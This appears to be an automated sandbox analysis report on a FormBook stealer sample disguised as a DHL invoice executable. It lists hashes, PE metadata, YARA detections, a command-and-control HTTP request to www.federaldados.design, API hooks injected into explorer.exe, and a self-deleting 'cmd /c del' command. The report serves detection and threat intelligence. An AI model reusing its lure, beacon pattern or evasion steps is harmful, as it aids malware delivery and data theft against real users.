                  General

                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.790881583355775
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:invoice dhl.delivery document and original invoice sign.exe
                  File size:449536
                  MD5:ebce26da75669d94dbc0550bf394b204
                  SHA1:bcc8f769e51cd9f8a160e58840f80a008e2b72e2
                  SHA256:5fef546d71e9ed9f2e457bfd9aeb23a42a5074af37599c7fe4dcfeb8f687723c
                  SHA512:0e87adccb6d3ca4ea2ee2e101a20ea81437e3f774dd3296c264c92ce763adacacbe1a8a4b9b6226c0b8403569c716fd5fcc55820ea4a0575172d396bae432ed0
                  SSDEEP:12288:pY6XjcPK3hl0If0PufZptLKxO5J/jJUf7b3:LXjSKgIf8ufTtLPlqfP
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i..a................................. ........@.. .......................@............@................................

                  File Icon

                  Icon Hash:00828e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0x46f0be
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Time Stamp:0x61A89569 [Thu Dec 2 09:44:09 2021 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:v4.0.30319
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                  Entrypoint Preview

                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x6f0640x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000x4c0.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x720000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x6d0c40x6d200False0.883519473081data7.80084963355IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                  .rsrc0x700000x4c00x600False0.37890625data4.67278801338IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .reloc0x720000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                  Resources

                  NameRVASizeTypeLanguageCountry
                  RT_VERSION0x700a00x26cdata
                  RT_MANIFEST0x7030c0x1b4XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators

                  Imports

                  DLLImport
                  mscoree.dll_CorExeMain

                  Version Infos

                  DescriptionData
                  Translation0x0000 0x04b0
                  LegalCopyright
                  Assembly Version0.0.0.0
                  InternalNameCMSFILEWRITABLETY.exe
                  FileVersion0.0.0.0
                  ProductVersion0.0.0.0
                  FileDescription
                  OriginalFilenameCMSFILEWRITABLETY.exe

                  Network Behavior

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 18:58:54.959861994 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.153683901 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.153938055 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.346704960 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.346857071 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.539767981 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.542661905 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.542689085 CET804979244.227.76.166192.168.2.6
                  Dec 2, 2021 18:58:55.542970896 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.542995930 CET4979280192.168.2.644.227.76.166
                  Dec 2, 2021 18:58:55.735187054 CET804979244.227.76.166192.168.2.6

                  UDP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Dec 2, 2021 18:58:54.919909000 CET5033953192.168.2.68.8.8.8
                  Dec 2, 2021 18:58:54.948086977 CET53503398.8.8.8192.168.2.6
                  Dec 2, 2021 18:59:16.066459894 CET6330753192.168.2.68.8.8.8
                  Dec 2, 2021 18:59:16.090806007 CET53633078.8.8.8192.168.2.6

                  DNS Queries

                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                  Dec 2, 2021 18:58:54.919909000 CET192.168.2.68.8.8.80x5c14Standard query (0)www.federaldados.designA (IP address)IN (0x0001)
                  Dec 2, 2021 18:59:16.066459894 CET192.168.2.68.8.8.80xb04dStandard query (0)www.mimamincloor.comA (IP address)IN (0x0001)

                  DNS Answers

                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                  Dec 2, 2021 18:58:54.948086977 CET8.8.8.8192.168.2.60x5c14No error (0)www.federaldados.designpixie.porkbun.comCNAME (Canonical name)IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET8.8.8.8192.168.2.60x5c14No error (0)pixie.porkbun.com44.227.76.166A (IP address)IN (0x0001)
                  Dec 2, 2021 18:58:54.948086977 CET8.8.8.8192.168.2.60x5c14No error (0)pixie.porkbun.com44.227.65.245A (IP address)IN (0x0001)
                  Dec 2, 2021 18:59:16.090806007 CET8.8.8.8192.168.2.60xb04dName error (3)www.mimamincloor.comnonenoneA (IP address)IN (0x0001)

                  HTTP Request Dependency Graph

                  • www.federaldados.design

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortProcess
                  0192.168.2.64979244.227.76.16680C:\Windows\explorer.exe
                  TimestampkBytes transferredDirectionData
                  Dec 2, 2021 18:58:55.346857071 CET11717OUTGET /9gr5/?KrIxB=GtutZXLXlTaHD4Kp&WDH=t25TG+ulm10lwD+thJsAbOsGVXQVz47UhtdUUfJn66HyA3cvvtnG3RYsUIYwzVeadKzVomQtsQ== HTTP/1.1
                  Host: www.federaldados.design
                  Connection: close
                  Data Raw: 00 00 00 00 00 00 00
                  Data Ascii:
                  Dec 2, 2021 18:58:55.542661905 CET11717INHTTP/1.1 307 Temporary Redirect
                  Server: openresty
                  Date: Thu, 02 Dec 2021 17:58:55 GMT
                  Content-Type: text/html; charset=utf-8
                  Content-Length: 168
                  Connection: close
                  Location: http://federaldados.design
                  X-Frame-Options: sameorigin
                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                  Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


                  Code Manipulations

                  User Modules

                  Hook Summary

                  Function NameHook TypeActive in Processes
                  PeekMessageAINLINEexplorer.exe
                  PeekMessageWINLINEexplorer.exe
                  GetMessageWINLINEexplorer.exe
                  GetMessageAINLINEexplorer.exe

                  Processes

                  Process: explorer.exe, Module: user32.dll
                  Function NameHook TypeNew Data
                  PeekMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1
                  PeekMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageWINLINE0x48 0x8B 0xB8 0x84 0x4E 0xE1
                  GetMessageAINLINE0x48 0x8B 0xB8 0x8C 0xCE 0xE1

                  Statistics

                  Behavior

                  Click to jump to process

                  System Behavior

                  Analysis Process: invoice dhl.delivery document and original invoice sign.exe PID: 3452 Parent PID: 6056

                  General

                  Start time:18:57:22
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x4e0000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:.Net C# or VB.NET
                  Yara matches:
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363236510.00000000028A6000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.363182286.0000000002871000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.364023300.0000000003879000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Analysis Process: invoice dhl.delivery document and original invoice sign.exe PID: 6188 Parent PID: 3452

                  General

                  Start time:18:57:26
                  Start date:02/12/2021
                  Path:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
                  Imagebase:0x990000
                  File size:449536 bytes
                  MD5 hash:EBCE26DA75669D94DBC0550BF394B204
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437063285.0000000001400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.437007987.00000000013D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.360478598.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.436548736.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.359940174.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low

                  Analysis Process: explorer.exe PID: 3440 Parent PID: 6188

                  General

                  Start time:18:57:29
                  Start date:02/12/2021
                  Path:C:\Windows\explorer.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\Explorer.EXE
                  Imagebase:0x7ff6f22f0000
                  File size:3933184 bytes
                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.393113317.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.405515832.000000000EE6F000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:high

                  Analysis Process: msdt.exe PID: 7056 Parent PID: 3440

                  General

                  Start time:18:58:00
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\msdt.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Windows\SysWOW64\msdt.exe
                  Imagebase:0xb30000
                  File size:1508352 bytes
                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622111638.0000000002CE0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Joe Security
                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.622077394.0000000002CB0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:moderate

                  Analysis Process: cmd.exe PID: 7092 Parent PID: 7056

                  General

                  Start time:18:58:04
                  Start date:02/12/2021
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:/c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
                  Imagebase:0x2a0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Analysis Process: conhost.exe PID: 7108 Parent PID: 7092

                  General

                  Start time:18:58:06
                  Start date:02/12/2021
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff61de10000
                  File size:625664 bytes
                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Disassembly

                  Code Analysis

                  Reset < >